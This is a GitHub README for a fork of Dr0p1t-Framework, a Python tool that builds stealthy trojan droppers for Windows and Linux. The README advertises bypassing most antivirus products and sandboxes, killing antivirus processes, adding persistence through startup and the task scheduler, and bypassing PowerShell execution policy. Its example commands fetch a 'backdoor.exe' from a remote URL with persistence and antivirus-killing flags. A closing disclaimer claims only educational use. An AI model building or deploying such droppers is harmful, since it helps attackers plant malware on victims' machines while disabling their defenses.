Skip to content
/ Dr0p1t-Framework Public
forked from D4Vinci/Dr0p1t-Framework

A framework that create an advanced stealthy dropper that bypass most AVs and have a lot of tricks

License

MIT license
1 star 377 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

kfr-ma/Dr0p1t-Framework

BranchesTags

Repository files navigation

Dr0p1t-Framework Stage Python 3.5 Python 2.7 Build Status

Version 1.1 , see CHANGELOG.md file

Have you ever heard about trojan droppers ? you can read about them from here.

Dr0p1t let you create a dropper that bypass most AVs, some sandboxes and have some tricks ;)

Features

  • Works with Windows and Linux
  • Adding malware after downloading it to startup
  • Adding malware after downloading it to task scheduler
  • Finding and killing the antivirus before running the malware
  • Running a custom (batch|powershell|vbs) file you have choosen before running the malware
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it

Screenshots ( Not always updated )

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1

Prerequisites

  • Python 3.x or 2.7 ( prefered 3.5 and don't use 3.6 because it's not supported yet by PyInstaller )
  • Python libraries requirements in requirements.txt

Installation

if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 😄

Todo

Check out this link

Contact

Disclaimer

Dr0p1t Framework not responsible for misuse and for illegal purposes. Use it only for work or educational purpose !!!

Copying a code from this framework or using it in another tool is accepted as you mention where you get it from 😄

Pull requests are always welcomed :D

Much more features to come, stay tuned !!

About

A framework that create an advanced stealthy dropper that bypass most AVs and have a lot of tricks

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 56.0%
  • HTML 42.0%
  • Batchfile 1.2%
  • Other 0.8%